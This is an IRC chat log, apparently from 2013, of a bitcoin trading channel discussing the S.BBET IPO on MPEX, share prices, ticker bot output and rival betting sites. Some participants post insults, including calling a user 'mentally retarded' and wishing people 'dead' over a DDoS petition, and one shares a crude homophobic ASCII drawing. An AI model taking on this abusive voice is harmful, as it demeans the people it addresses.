Jan 11 02:19:07 really. Jan 11 02:19:21 anyway, you will keep 80% of the _PROFIT_ yourselves Jan 11 02:19:34 and 20% to the shares.. shares that seem to value over 20000 usd overall Jan 11 02:19:37 Anduck it already made like 30. Jan 11 02:19:38 I am consitently amazed that you are able to remember to keep breathing let alone connect to IRC Jan 11 02:20:09 duh Jan 11 02:20:10 well Jan 11 02:20:36 where's mpbor at the moment Jan 11 02:20:37 !ticker MPEX SBBET Jan 11 02:20:38 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 11 02:20:40 !ticker MPEX S.BBET Jan 11 02:20:42 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 11 02:20:42 lyspooner a shade under 5 Jan 11 02:20:47 its not in the json Jan 11 02:20:49 i think Jan 11 02:20:51 hum Jan 11 02:21:42 nope Jan 11 02:21:43 missing Jan 11 02:22:16 how are those cme-based futures' volumes on mpex Jan 11 02:22:20 link me up Jan 11 02:22:50 lyspooner pretty much dry. Jan 11 02:22:59 !ticker MPEX S.BBET Jan 11 02:23:01 [MPEX:S.BBET] 1D: 0.000337 / 0.00062553 / 0.0035 (1880251 shares, 1,176.16 BTC), 7D: 0.000337 / 0.00062553 / 0.0035 (1880251 shares, 1,176.16 BTC), 30D: 0.000337 / 0.00062553 / 0.0035 (1880251 shares, 1,176.16 BTC) Jan 11 02:23:03 there we go Jan 11 02:23:15 :D Jan 11 02:23:16 lol'd Jan 11 02:23:38 i read the (new) article about how awesome mpex is Jan 11 02:23:46 mircea_popescu: how much of S.BBET got sold there? Jan 11 02:23:51 [MPEX] [S.BBET] 7038 @ 0.0006 = 4.2228 BTC [-] Jan 11 02:23:55 it's totally awesome and like provably awesome too Jan 11 02:24:02 LOL Jan 11 02:24:17 Back down it goes. Jan 11 02:24:18 lyspooner lol which one Jan 11 02:24:20 i do those like weekly Jan 11 02:24:28 Ok, sold all my shares =/ Jan 11 02:24:30 the one where you excerpt anduck Jan 11 02:24:48 now i gotta google this Jan 11 02:24:52 he's like "it's possibly not awesome" and you were like "nope, totally awesome" Jan 11 02:25:09 o o o this. Jan 11 02:25:13 http://trilema.com/2012/is-smpoe-really-worth-that-much/ Jan 11 02:25:17 totally forgoat. Jan 11 02:25:18 yeah that one Jan 11 02:25:23 lyspooner: duh Jan 11 02:25:28 wait till he realises s.mpoe makes me worth like 600k btc Jan 11 02:25:38 :D Jan 11 02:26:03 mircea_popescu: when will you be aged 40 and turn pir...pir.... you know. Jan 11 02:26:07 the "share of m3" argument might hold water Jan 11 02:26:20 Well damn, I only made 10 BTC off of this IPO Jan 11 02:26:21 but for reelzz, grats mp Jan 11 02:26:23 well done Jan 11 02:26:31 fucking can't believe it...apparently coinbr *did* manage to correctly split the carnage between 6 users and dozen orders Jan 11 02:26:36 omfg ? Jan 11 02:26:39 jurov im in the same boat. Jan 11 02:26:44 i can;'t believe this worked lol Jan 11 02:27:23 apparently mpex can handle 300 orders in a second. Jan 11 02:27:24 i cant believe my eyes really Jan 11 02:27:34 interesting Jan 11 02:27:35 i guess all that hardware does something Jan 11 02:27:41 hmmm Jan 11 02:27:42 mircea_popescu Not sure about that Jan 11 02:27:49 (didn't take a second, either, they just all came the same second) Jan 11 02:27:58 I hit trilema from corp, shows 4 credits, I go back and theres none Jan 11 02:28:04 stuff was filling more slowly than that based on my page refreshes Jan 11 02:28:11 assuming corp security weenies are following my links :) Jan 11 02:28:36 Bugpowder the webserver dun worry me so much Jan 11 02:28:45 it's the trade engine that's the point of it all Jan 11 02:28:48 yeah Jan 11 02:28:50 well Jan 11 02:28:50 dub likely. Jan 11 02:28:56 ok Jan 11 02:29:03 nice spread though Jan 11 02:29:05 righ tnow Jan 11 02:29:20 lol Jan 11 02:29:21 yeah Jan 11 02:29:29 yep Jan 11 02:29:51 people will be so mad when they realize they bought the shares 1000x over real price :D Jan 11 02:30:18 you should probably warn them. Jan 11 02:30:21 and bids are gone =P Jan 11 02:30:31 mostly Jan 11 02:30:54 mircea_popescu: how much proportion of S.BBET got sold there? Jan 11 02:31:03 don't you do it in some kind of waves or something? Jan 11 02:31:08 and this was the first one Jan 11 02:31:13 mnope. Jan 11 02:31:16 no, this was the only wave Jan 11 02:31:21 ahh Jan 11 02:31:36 with 30% sold. The remaining 10k asks are what's left of 3 million shares IPO Jan 11 02:31:41 on 10 million Jan 11 02:31:49 btw, was there any bet wrt IPO? Jan 11 02:32:00 guess not Jan 11 02:32:32 Weird... There average price I paid, after profit taking for my current shares is within 0.2% of the mean price Jan 11 02:32:39 http://youtu.be/2Mr4mjeZ2ko Jan 11 02:32:44 there you go Anduck Jan 11 02:32:59 Bugpowder ok. that's the sort of shit im talking about. Jan 11 02:33:07 that. price formation ? mobs are stupid ? Jan 11 02:33:10 riddle me that coherence. Jan 11 02:33:29 ;;calc (325 -(.0006*117493+84))/272460 Jan 11 02:33:29 0.000625795346106 Jan 11 02:33:47 thats my ave price Jan 11 02:34:24 mod6: xD Jan 11 02:36:30 [MPEX] [S.DICE] 696 @ 0.00458832 = 3.1935 BTC [+] Jan 11 02:36:31 [MPEX] [S.DICE] 1396 @ 0.00456034 = 6.3662 BTC [-] Jan 11 02:36:33 [MPEX] [S.DICE] 208 @ 0.00455909 = 0.9483 BTC [-] Jan 11 02:37:01 !ticker MPEX S.BBET Jan 11 02:37:02 [MPEX:S.BBET] 1D: 0.000337 / 0.00062543 / 0.0035 (1887289 shares, 1,180.38 BTC), 7D: 0.000337 / 0.00062543 / 0.0035 (1887289 shares, 1,180.38 BTC), 30D: 0.000337 / 0.00062543 / 0.0035 (1887289 shares, 1,180.38 BTC) Jan 11 02:37:18 so 0.00062543 is overall avg price? Jan 11 02:37:34 so far Jan 11 02:37:39 looks like it Jan 11 02:38:11 amazing Jan 11 02:38:21 there was profit taking after the run up though Jan 11 02:39:20 that was a nice example of how to do profit when ipo happens Jan 11 02:39:27 ;;calc 0.000625795346106/0.0006254 Jan 11 02:39:29 1.00063214919 Jan 11 02:39:34 three sigs Jan 11 02:39:36 announced on btctalk: https://bitcointalk.org/index.php?topic=135834.0 Jan 11 02:39:46 remember when FB IPOed? price went _down_ Jan 11 02:40:01 lol this guy is struck Jan 11 02:40:16 Anduck, sometimes prices go up, sometimes they go down. it's the nature of this beast. Jan 11 02:40:22 this is a much better valuation method though Jan 11 02:40:31 not guessing Jan 11 02:40:32 than fb ? yes, i think it is. Jan 11 02:40:36 ALSO my system didn't go down Jan 11 02:40:39 unlike nasdaq. Jan 11 02:40:39 does anyone else use this idea? Jan 11 02:40:43 not afaik. Jan 11 02:40:47 far as i know i invented it. Jan 11 02:40:50 hance mpipo Jan 11 02:41:01 I may start a finance blog Jan 11 02:41:06 huh Jan 11 02:41:10 this will be an very interesting case study Jan 11 02:41:55 btw Jan 11 02:42:09 mircea_popescu: is there a c++ server running mpex or just php + db? Jan 11 02:42:15 or something else Jan 11 02:42:46 Bugpowder by all means. Jan 11 02:42:49 someone should. Jan 11 02:42:57 mircea_popescu will you lower the ask price if no one buys? Jan 11 02:43:02 nope. Jan 11 02:43:05 it's set in the contract. Jan 11 02:43:13 I'm very interested in optimization algorithims Jan 11 02:43:25 particularly in markets that are very inefficient Jan 11 02:43:29 me too. Jan 11 02:43:30 ok Jan 11 02:43:31 liek IPO pricing Jan 11 02:43:37 everyone get off the internet Jan 11 02:43:52 fu dub Jan 11 02:44:05 the stupid has reached critical mass Jan 11 02:44:12 http://paritynews.com/government/item/552-anonymous-files-petition-to-make-ddos-legal-form-of-protest Jan 11 02:44:18 ahaha Jan 11 02:44:23 xD Jan 11 02:44:28 game over man Jan 11 02:44:45 why should they be legall.. Jan 11 02:44:50 I want anyone that agrees with that dead, immediately Jan 11 02:44:55 ahh Jan 11 02:44:57 " The hacking collective doesn’t consider DDoS as a form of attack and equates it to hitting the ‘refresh’ button on a webpage." Jan 11 02:45:07 that guy is trolling or something Jan 11 02:46:07 but hey mircea_popescu wanna answer my question about mpex? Jan 11 02:46:42 not rly. Jan 11 02:46:50 you'll have to dig through old documentations/discussions. Jan 11 02:47:40 so there aint a simple answer? Jan 11 02:47:41 wut Jan 11 02:47:50 :_: Jan 11 02:47:53 take some time, read the faq? Jan 11 02:48:03 wasnt in the faq if i remember correctly. Jan 11 02:48:10 [MPEX] [S.DICE] 3200 @ 0.00459323 = 14.6983 BTC [+] Jan 11 02:48:11 [MPEX] [S.DICE] 650 @ 0.00462031 = 3.0032 BTC [+] Jan 11 02:48:13 [MPEX] [S.DICE] 850 @ 0.0046641 = 3.9645 BTC [+] Jan 11 02:48:39 oh, i thought you said before that it was tldr Jan 11 02:49:18 Anduck, if you open and fund a coinbr account, i may be persuaded to explain Jan 11 02:49:36 let me check coinbr Jan 11 02:49:47 lol Jan 11 02:50:04 COINBR ROCKS!!! Jan 11 02:50:05 uhhh Jan 11 02:50:36 asa1024 *hint* affiliate *hint* Jan 11 02:50:56 doh Jan 11 02:50:58 lol Jan 11 02:51:02 i don't get it... mpex got what, 30k for sdice ? Jan 11 02:51:07 why shouldn't it get 1k for bbet Jan 11 02:51:41 S.DICE makes most of the whole bitcoin transactions, they make huge profits in a month Jan 11 02:51:47 _huge_ Jan 11 02:51:57 heh. Jan 11 02:52:12 + there already exists services like bitbet.us and they've not succeeded very well after start Jan 11 02:52:12 part of that because people know they've got mpex backing them. Jan 11 02:52:20 succeeding meaning generating good profit Jan 11 02:52:24 same thing here. being on mpex means a lot. Jan 11 02:53:09 hmmm Jan 11 02:53:22 whats the estimated profit of bitbet / mo? Jan 11 02:53:27 no estimate. Jan 11 02:53:31 you must have done some kind of estimates..? Jan 11 02:54:25 No estimate... Jan 11 02:55:19 ahh this was so nice. Jan 11 02:55:25 quite the afterglow, sort of like good wine. Jan 11 02:55:30 :) Jan 11 02:55:47 like fine mdma Jan 11 02:56:17 haha Jan 11 02:57:52 MP is currently summoning bitches to casually whip while he strokes his beard and ruminates over his success Jan 11 02:58:57 rofl Jan 11 02:59:03 :D Jan 11 02:59:11 i know i would Jan 11 02:59:58 heh http://imgur.com/lb14X Jan 11 03:00:43 ahh walmart Jan 11 03:00:52 "Spoiler: It's not going to beat betsofbitco.in" haha btctalk delivers Jan 11 03:01:01 Anduck betsofbitcoin sucks because they don't have variable time decay and they don't have any big bettors setting odds lines with their own capital. Bitbet will have both. Jan 11 03:01:22 right Jan 11 03:01:22 ok Jan 11 03:01:37 time will show Jan 11 03:02:33 Bugpowder there's more but those two can be enough for now i guess Jan 11 03:03:08 "Let's see how well it does after the hype has cooled down." Jan 11 03:03:10 what hype ?! Jan 11 03:03:39 the hype Jan 11 03:04:03 like ? Jan 11 03:05:02 >1100 btc for <20% of bitbet. Jan 11 03:05:54 jurov: i am pretty sure bitbet will atleast be a very good competitor Jan 11 03:06:09 competitor ? Jan 11 03:06:12 puhleaze. Jan 11 03:06:48 =P Jan 11 03:06:57 good hype there, yes.. Jan 11 03:07:15 no, that is a statement of fact. Jan 11 03:07:25 add up the bets made in the past week, see what 80% is on bitbet. Jan 11 03:07:30 there's no competition in those terms. Jan 11 03:07:36 it's like some real world companies.. people praise them like gods and _really_ they just poop in the customers heads Jan 11 03:07:41 and hype is a matter of repeating dubious/false claims through many channels. Jan 11 03:07:50 not a matter of people discussing facts in their out of the world irc channel. Jan 11 03:08:16 duhh.. thats not the definition of hype Jan 11 03:08:43 UD tells it the best way: ' Jan 11 03:08:43 A fad. A clever marketing strategy which a product is advertized as the thing everyone must have, to the point where people begin to feel they need to consume it.' Jan 11 03:08:51 [MPEX] [S.DICE] 2000 @ 0.0046641 = 9.3282 BTC [+] Jan 11 03:08:53 [MPEX] [S.DICE] 20 @ 0.00471508 = 0.0943 BTC [+] Jan 11 03:08:54 [MPEX] [S.DICE] 130 @ 0.00471751 = 0.6133 BTC [+] Jan 11 03:08:56 right. Jan 11 03:09:07 where pray tell was bbet advertised ? Jan 11 03:09:20 wut? Jan 11 03:09:49 i don't think it's really about advertising about it or not Jan 11 03:10:05 it's "from the owner of mpex" - that's enough to grow up a hype Jan 11 03:10:09 right? Jan 11 03:10:28 please stop talking to this waste of oxygen Jan 11 03:11:03 dear folks, no sweat Jan 11 03:11:23 dub the disadvantage of news getting out : the forum moves to irc Jan 11 03:12:06 "from the owner of mpex" is fact, not hype in this case. Jan 11 03:12:27 it is a fact, yes Jan 11 03:12:35 but it _grows_ the hype for bitbet Jan 11 03:12:39 ... Jan 11 03:12:41 also a fact Jan 11 03:12:47 how old are you Anduck ? Jan 11 03:12:59 how is that relevant to this subject? Jan 11 03:13:42 because you are making mistakes consistent with an intellectual age of about fifteen, Jan 11 03:13:54 and i'd like to know if you're a healthy young human or a mentally retarded one. Jan 11 03:13:59 please tell me in pm about my mistakes Jan 11 03:14:06 fact can not add to hype. Jan 11 03:14:24 How not? O.o Jan 11 03:14:42 the old story of know the tree by its fruit. Jan 11 03:14:48 if fact can add to hype then there's no fact. Jan 11 03:14:49 i think mircea popescu thinks hype means something else than it means Jan 11 03:14:59 A fact, such as a celebrity endorsing a product, can create a lot of hype for a product... Jan 11 03:15:10 it's no the fact that creates the hype. Jan 11 03:15:18 ... Jan 11 03:15:28 alright Jan 11 03:15:45 "endorsing" is the weasel word in there. Jan 11 03:15:55 the sentence correctly is "the fact of a celebrity hyping a product adds to hype' Jan 11 03:15:58 that's true. Jan 11 03:16:03 simply being the thing they use does not. Jan 11 03:16:05 maybe i should quit this conversation before i get accusated of being mentally retarded again Jan 11 03:16:19 or end up featured in another trilima article Jan 11 03:16:25 now that's unlikely. Jan 11 03:16:27 Endorsing is not the same as hyping. Jan 11 03:16:42 Namworld fact remains, falsehood does not stem from truth. Jan 11 03:16:50 the key element of hype is falsehood. Jan 11 03:16:54 (the other one is repetition) Jan 11 03:16:55 Hype is not falsehood. Jan 11 03:17:02 if presented as fact it is. Jan 11 03:17:14 [BTCTC] [TEST.ONE] 4321 @ 123.12345678 = 532016.4567 BTC Jan 11 03:17:16 mod6: i wouldn't mind in this case Jan 11 03:17:25 It's but one definition of hype. Jan 11 03:17:45 it's funny, cause i'm currently embroiled in an equally amusing debate with some guy on the forum. Jan 11 03:17:47 Hype can also be the interest arising from the advertising and facts regarding a new product. Jan 11 03:17:51 that was about the definition of fiat. Jan 11 03:18:17 ... Jan 11 03:18:26 blah blah blah Jan 11 03:19:13 Namworld i guess it could be. the astute observer might notice that i in general deal in anti-hype Jan 11 03:19:19 works pretty well in btc so far. Jan 11 03:24:19 [BTCTC] [TEST-TWO] 4321 @ 123.12345678 = 532016.4567 BTC Jan 11 03:24:51 !ticker btctc test-two Jan 11 03:24:53 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 11 03:25:29 [MPEX] [S.DICE] 77 @ 0.00471751 = 0.3632 BTC [+] Jan 11 03:25:31 [MPEX] [S.DICE] 1200 @ 0.00473752 = 5.685 BTC [+] Jan 11 03:25:32 [MPEX] [S.DICE] 234 @ 0.00474435 = 1.1102 BTC [+] Jan 11 03:25:32 [MPEX] [S.DICE] 700 @ 0.00474687 = 3.3228 BTC [+] Jan 11 03:25:34 [MPEX] [S.DICE] 192 @ 0.00475027 = 0.9121 BTC [+] Jan 11 03:25:35 [MPEX] [S.DICE] 1097 @ 0.00475357 = 5.2147 BTC [+] Jan 11 03:26:49 ;;ticker Jan 11 03:26:49 BTCUSD ticker | Best bid: 14.06000, Best ask: 14.13597, Bid-ask spread: 0.07597, Last trade: 14.06000, 24 hour volume: 51252.60596179, 24 hour low: 13.77000, 24 hour high: 14.32000, 24 hour vwap: 14.05461 Jan 11 03:27:20 !ticker bt ltc-mining Jan 11 03:27:22 [BTCT:LTC-MINING] 1D: 0.4399 / 0.44 / 0.44 (5 shares, 2.2 BTC), 7D: 0.411 / 0.44 / 0.4503 (20 shares, 8.9 BTC), 30D: 0.3801 / 0.56 / 0.89 (34 shares, 18.9 BTC) Jan 11 03:27:22 "bitcoin collapses on news of oversubscribed s.bbet ipo" Jan 11 03:27:25 now that's hype :D Jan 11 03:28:52 thats fud Jan 11 03:38:02 lol i like someone put a 5mn share wall at 2500 Jan 11 03:38:10 stuff like that has happened before... Jan 11 03:43:02 too bad tehre were no props on the # of ipo blocks sold Jan 11 03:43:06 that would ahve been funnny Jan 11 03:43:42 ya srsly. Jan 11 03:43:59 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1575 BTC Jan 11 03:44:02 kinda too easy to manipulate tho i guess Jan 11 03:44:43 !ticker bt btc-trading-pt Jan 11 03:44:43 [BTCT:BTC-TRADING-PT] 1D: 0.1575 / 0.1575 / 0.1575 (1 shares, 0.2 BTC), 7D: 0.1387 / 0.14 / 0.1575 (190 shares, 27.0 BTC), 30D: 0.125 / 0.14 / 0.1689 (426 shares, 58.6 BTC) Jan 11 03:44:56 big bucksssss Jan 11 03:44:59 o hey Jan 11 03:45:11 thanks for the assist kakobrekla, that was a trade on the site, works great Jan 11 03:45:20 welcome burnside Jan 11 03:45:39 too expensive to manipulate though Jan 11 03:46:47 that'd depend on the bet i reckno Jan 11 03:46:51 so Ukto the only one left ? Jan 11 03:48:04 and pico! Jan 11 03:48:07 ;> Jan 11 03:49:27 ugh Jan 11 03:50:11 you know, sooner or later you'll meet the nasty problem of having to set a standard. Jan 11 03:50:15 better be prepared. Jan 11 03:51:01 how about volume Jan 11 03:51:17 pico can claim 1bn volume, nobody'd know Jan 11 03:51:26 havelock has had what today, 100 btc ? 10 ? Jan 11 03:51:31 hehe Jan 11 03:51:40 dunno Jan 11 03:51:44 yeah. me either. Jan 11 03:52:05 but i know i sure as heck don't want to have mpex trades stream in the same place with that dood's imaginary 1k basic "mining corp" Jan 11 03:52:18 lulz Jan 11 03:52:36 maybe case by case basis works Jan 11 03:53:04 if (vol > 2) exit; Jan 11 03:53:15 hm Jan 11 03:53:22 maybe u should make another channel for mpex-only stream? Jan 11 03:53:30 that would exit everything but pico Jan 11 03:53:55 heh, meant inside the pico code block :P Jan 11 03:54:03 xD Jan 11 04:00:09 ;;later tell bugpowder btw you were right, my bad. a bunch of models were discussed and i forgot that in the end i decided the blocks go +1s each Jan 11 04:00:10 The operation succeeded. Jan 11 04:02:00 hey burnside, I'll pm you Jan 11 04:05:18 [BTCTC] [BTC-BOND] 20 @ 0.0098 = 0.196 BTC Jan 11 04:06:28 [MPEX] [S.DICE] 103 @ 0.00475357 = 0.4896 BTC [+] Jan 11 04:06:29 [MPEX] [S.DICE] 500 @ 0.00475404 = 2.377 BTC [+] Jan 11 04:06:30 [MPEX] [S.DICE] 2235 @ 0.00475426 = 10.6258 BTC [+] Jan 11 04:06:31 [MPEX] [S.DICE] 466 @ 0.00475538 = 2.216 BTC [+] Jan 11 04:06:32 [MPEX] [S.DICE] 346 @ 0.00475665 = 1.6458 BTC [+] Jan 11 04:11:16 BTC-BOND! Jan 11 04:11:40 o hey! Jan 11 04:11:41 wd. Jan 11 04:11:50 !ticker b btc-bond Jan 11 04:11:51 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 11 04:11:54 !ticker btc btc-bond Jan 11 04:11:56 [BTCT:BTC-BOND] 1D: 0.0097 / 0.0097 / 0.0098 (43 shares, 0.4 BTC), 7D: 0.009 / 0.01 / 0.01 (5370 shares, 50.6 BTC), 30D: 0.008 / 0.01 / 0.011 (8094 shares, 74.9 BTC) Jan 11 04:13:58 Yeah, not really big. Jan 11 04:14:25 seems very stable. Jan 11 04:14:46 Well I offer to repay them 0.01 BTC on demand. Jan 11 04:14:52 a Jan 11 04:15:02 odd that it trades for undet then ?! Jan 11 04:15:07 and if someone puts them low on the ask, I buy them at a discount. Jan 11 04:15:14 Yes, I was saying this the other day. Jan 11 04:15:20 i see now lol Jan 11 04:15:31 The 40 BTC withdrawal was for that. It was going as low as 0.009 Jan 11 04:15:35 10% off =/ Jan 11 04:15:59 i guess people are still muchly dicking about Jan 11 04:16:00 No one ever used the email to request to redeem yet. Not once. Jan 11 04:16:06 189bxJPdjZj7rZtqFBAdMsHbnkdm3U3Wz5 ahaha jurov, the impressionist painter. Jan 11 04:16:08 Looks like it. Jan 11 04:16:30 Namworld i guess that shows how well read contracts are. Jan 11 04:19:43 [MPEX] [S.DICE] 1337 @ 0.00470857 = 6.2954 BTC [-] Jan 11 04:20:07 I see the same thing everywhere... people complaining of being scammed for clicking on a button confirming a fee. People confirming a service without even checking the pricing. People complaining of not being warned of something they couldn't do or would be charged for that is written clearly in instructions. Jan 11 04:20:20 They just go click click click I want this now. Jan 11 04:20:34 I want a cigar. Jan 11 04:20:37 Now. Jan 11 04:20:55 i have a cigar Jan 11 04:20:56 now Jan 11 04:21:08 ill have coffee instead Jan 11 04:21:17 now Jan 11 04:21:25 it's cold Jan 11 04:21:27 f* Jan 11 04:22:31 colf ? Jan 11 04:22:32 fold ? Jan 11 04:22:36 ft's ? Jan 11 04:22:42 omfg i must knowf Jan 11 04:23:19 if's cold. Jan 11 04:23:33 it'f Jan 11 04:24:00 ur breaking my parser Jan 11 04:34:36 https://betbybitcoin.com/en/top Jan 11 04:34:39 lol that didn't take long ? Jan 11 04:35:52 I sale betting to you Jan 11 04:36:17 velly chep Jan 11 04:36:18 [BTCTC] [ESECURITYSABTC] 7 @ 0.745 = 5.215 BTC Jan 11 04:36:19 [BTCTC] [ESECURITYSABTC] 3 @ 0.75 = 2.25 BTC [+] Jan 11 04:36:43 dub :DD Jan 11 04:36:58 accually not that cheap Jan 11 04:37:09 Owner's fee 10.00 % Jan 11 04:37:13 dub im currently getting about one "premium stock exchange domain" offered a week Jan 11 04:37:15 wat Jan 11 04:37:16 whatever da fuck that means Jan 11 04:37:18 i imagine it's bound to go up Jan 11 04:51:22 pigeons https://bitcointalk.org/index.php?topic=135395.0 Jan 11 04:51:24 your kinda biz Jan 11 04:51:51 meanwhile irl : http://www.batstrading.com/alerts/ Jan 11 04:52:06 tldr : fake exchange manipulates prices. "tech error" blamed. Jan 11 04:57:02 lame, on call for the first time in 6 months or so Jan 11 04:57:47 OMG fuckin rainbow bitcoin https://bitcointalk.org/index.php?topic=135848.msg1447186#msg1447186 Jan 11 04:59:09 nice answer Jan 11 04:59:58 I propose a standard of variable sized ascii penises Jan 11 05:00:38 optionally rainbow colored Jan 11 05:00:43 :DD Jan 11 05:00:54 i got a black one Jan 11 05:01:37 no racism. Jan 11 05:01:57 ___ Jan 11 05:02:00 // 7 KARMA WILL GET YOU Jan 11 05:02:03 (_,_/\ Jan 11 05:02:05 \ \ MEANWHILE THIS GAY ASCII DICK Jan 11 05:02:09 \ \ Jan 11 05:02:12 _\ \__ MAKES GOOD COMPANY Jan 11 05:02:15 ( \ ) Jan 11 05:02:17 \___\___/ Jan 11 05:02:33 [MPEX] [S.DICE] 4250 @ 0.00461194 = 19.6007 BTC [-] Jan 11 05:02:35 [MPEX] [S.DICE] 442 @ 0.00455909 = 2.0151 BTC [-] Jan 11 05:02:36 [MPEX] [S.DICE] 2582 @ 0.00455832 = 11.7696 BTC [-] Jan 11 05:02:37 burnside in between. Jan 11 05:03:38 [MPEX] [S.DICE] 118 @ 0.00455832 = 0.5379 BTC [-] Jan 11 05:03:39 [MPEX] [S.DICE] 643 @ 0.00455708 = 2.9302 BTC [-] Jan 11 05:03:41 [MPEX] [S.DICE] 3359 @ 0.00455708 = 15.3072 BTC [-] Jan 11 05:03:42 [MPEX] [S.DICE] 1600 @ 0.00455673 = 7.2908 BTC [-] Jan 11 05:03:43 [MPEX] [S.DICE] 500 @ 0.00455613 = 2.2781 BTC [-] Jan 11 05:03:43 [MPEX] [S.DICE] 1400 @ 0.00455395 = 6.3755 BTC [-] Jan 11 05:03:44 [MPEX] [S.DICE] 700 @ 0.00455109 = 3.1858 BTC [-] Jan 11 05:03:45 [MPEX] [S.DICE] 550 @ 0.00455034 = 2.5027 BTC [-] Jan 11 05:03:47 [MPEX] [S.DICE] 2130 @ 0.00454938 = 9.6902 BTC [-] Jan 11 05:04:01 >I'm not worried about myself, I know math. I'm worried about grandmas who spent their whole lives doing money transactions to 2 decimal places. Jan 11 05:04:02 omg. Jan 11 05:04:09 i cant even... Jan 11 05:05:53 haha I hate tuxblackedo but he comes with teh funny at times Jan 11 05:05:58 http://i.qkme.me/3sirj9.jpg Jan 11 05:09:47 [MPEX] [S.DICE] 720 @ 0.00454938 = 3.2756 BTC [-] Jan 11 05:09:48 [MPEX] [S.DICE] 1150 @ 0.00454814 = 5.2304 BTC [-] Jan 11 05:09:50 [MPEX] [S.DICE] 2000 @ 0.00454736 = 9.0947 BTC [-] Jan 11 05:09:51 [MPEX] [S.DICE] 130 @ 0.00454491 = 0.5908 BTC [-] Jan 11 05:11:48 [BTCTC] [BTC-MINING] 1 @ 0.05 BTC Jan 11 05:13:16 Look, BTC-MINING started trading =/ Jan 11 05:25:25 [MPEX] [S.DICE] 3900 @ 0.00461687 = 18.0058 BTC [+] Jan 11 05:25:26 [MPEX] [S.DICE] 1200 @ 0.00469636 = 5.6356 BTC [+] Jan 11 05:31:30 http://www.youtube.com/watch?v=_ERE4uiufqE Jan 11 05:38:28 i installed some personality into assbot Jan 11 05:46:16 retardas galore Jan 11 05:46:43 dub why ya hate the man ? Jan 11 05:46:48 he wrote php dns Jan 11 05:49:24 [MPEX] [S.DICE] 3370 @ 0.00454491 = 15.3163 BTC [-] Jan 11 05:49:26 [MPEX] [S.DICE] 1100 @ 0.00454234 = 4.9966 BTC [-] Jan 11 05:49:27 [MPEX] [S.DICE] 230 @ 0.00454216 = 1.0447 BTC [-] Jan 11 05:53:44 he wrote what? Jan 11 05:53:55 [MPEX] [S.DICE] 570 @ 0.00454216 = 2.589 BTC [-] Jan 11 05:56:09 [MPEX] [S.DICE] 2280 @ 0.00453528 = 10.3404 BTC [-] Jan 11 05:56:42 !ticker MPEX S.BBET Jan 11 05:56:43 [MPEX:S.BBET] 1D: 0.000337 / 0.00062543 / 0.0035 (1887289 shares, 1,180.38 BTC), 7D: 0.000337 / 0.00062543 / 0.0035 (1887289 shares, 1,180.38 BTC), 30D: 0.000337 / 0.00062543 / 0.0035 (1887289 shares, 1,180.38 BTC) Jan 11 05:57:05 How did a share go off at .0035? Jan 11 06:01:46 Buglouse out of order reporting ? Jan 11 06:01:49 dub a dns server in php Jan 11 06:02:02 I don't think it really went off there Jan 11 06:02:28 coinbr doesn't show it Jan 11 06:03:39 o think it must be some twitter thing Jan 11 06:04:17 err twitter thing in the json api? Jan 11 06:04:51 no i mean the placing of it in the printout Jan 11 06:06:20 there was in fact a 2347 * 350000 Jan 11 06:07:36 and i think coinbr does show it, that's why the horiz lines Jan 11 06:09:29 hmm Jan 11 06:09:48 fat finger order combined with someone reselling before the IPO gap formed? Jan 11 06:10:45 NOP Jan 11 06:11:08 The orange horizontal line does not extend to the edge of the plot in coinbr Jan 11 06:11:43 it stops around .00184 Jan 11 06:11:48 the last IPO block to go Jan 11 06:16:14 hm Jan 11 06:16:34 Bugpowder i imagine someone put an order at 350000 Jan 11 06:16:40 when they meant to put it in at 35000 Jan 11 06:16:43 and that's all it took. Jan 11 06:16:57 next block on sale hit that (partially) Jan 11 06:17:20 yah Jan 11 06:17:26 though why is it not on coinbr Jan 11 06:17:40 now that i don't know. Jan 11 06:17:51 but i noticed twitter cut off trades after the first ~100 Jan 11 06:18:05 I am so bummed I did not make anything on the IPO yet Jan 11 06:18:06 http://www.batstrading.com/alerts/ still in shock over this one Jan 11 06:18:18 lol didn't you say you took some profits ? Jan 11 06:18:20 I am going to look at my Vanguard account and try to cheer up Jan 11 06:18:23 Well yes Jan 11 06:18:29 I got shut out on my bids Jan 11 06:18:38 kept miss typing my password Jan 11 06:19:00 [MPEX] [S.DICE] 3147 @ 0.00453433 = 14.2695 BTC [-] Jan 11 06:19:01 [MPEX] [S.DICE] 2153 @ 0.00453373 = 9.7611 BTC [-] Jan 11 06:19:02 then bought everything from 45-100 Jan 11 06:19:24 then sold 30k @ 175 Jan 11 06:20:12 SP500 5 year high? Jan 11 06:20:30 ya passowrds can quickly become an issue in situations like this. Jan 11 06:22:15 I should have pyMPEX to just accept my creditials automattically or something Jan 11 06:25:06 mircea_popescu Did you read the Peter Thiel class notes from the Stanford startup course? Jan 11 06:25:38 nope. Jan 11 06:26:12 They are pretty good. (I think) http://blakemasters.com/peter-thiels-cs183-startup Jan 11 06:26:58 http://betsofbitco.in needs to break out of the BFL and Bitcoin betting rut. Jan 11 06:33:41 [MPEX] [S.DICE] 47 @ 0.00453373 = 0.2131 BTC [-] Jan 11 06:33:42 [MPEX] [S.DICE] 1150 @ 0.00453336 = 5.2134 BTC [-] Jan 11 06:33:44 [MPEX] [S.DICE] 803 @ 0.00453297 = 3.64 BTC [-] Jan 11 06:35:00 [MPEX] [S.DICE] 4150 @ 0.00457397 = 18.982 BTC [+] Jan 11 06:36:47 [MPEX] [S.MPOE] 1 @ 0.00063493 BTC [+] Jan 11 06:41:36 In most prior human societies, people made money by taking it from others. The industrial revolution wrought a paradigm shift in which people make money through trade, not plunder. Jan 11 06:41:45 that's the sort of thing i don't like to see. Jan 11 06:41:55 millitant inculture. Jan 11 06:41:59 lol Jan 11 06:42:32 obviously in the next paragraph it falls wholesale into futurism. Jan 11 06:42:35 a well. Jan 11 06:42:44 skip ahead then Jan 11 06:42:48 lemme tell you a big secret pretty much any scholar knows : Jan 11 06:43:00 if you were to wake up in 12 ad rome tomorrow morning Jan 11 06:43:15 you couldn't prove this by just talking to the people. Jan 11 06:43:23 i mean, sure, they'd be speaking latin. Jan 11 06:43:48 but on this simple "i'm from the future so i'm so much better" paradigm you'd do jack shit. Jan 11 06:44:20 [MPEX] [S.MPOE] 1 @ 0.00063493 BTC [+] Jan 11 06:45:06 most people in most times traded for the simple reason that fighting is so fucking dangerous. Jan 11 06:45:08 Section IV on is good. Also Class 3 and 4 are very interesting Jan 11 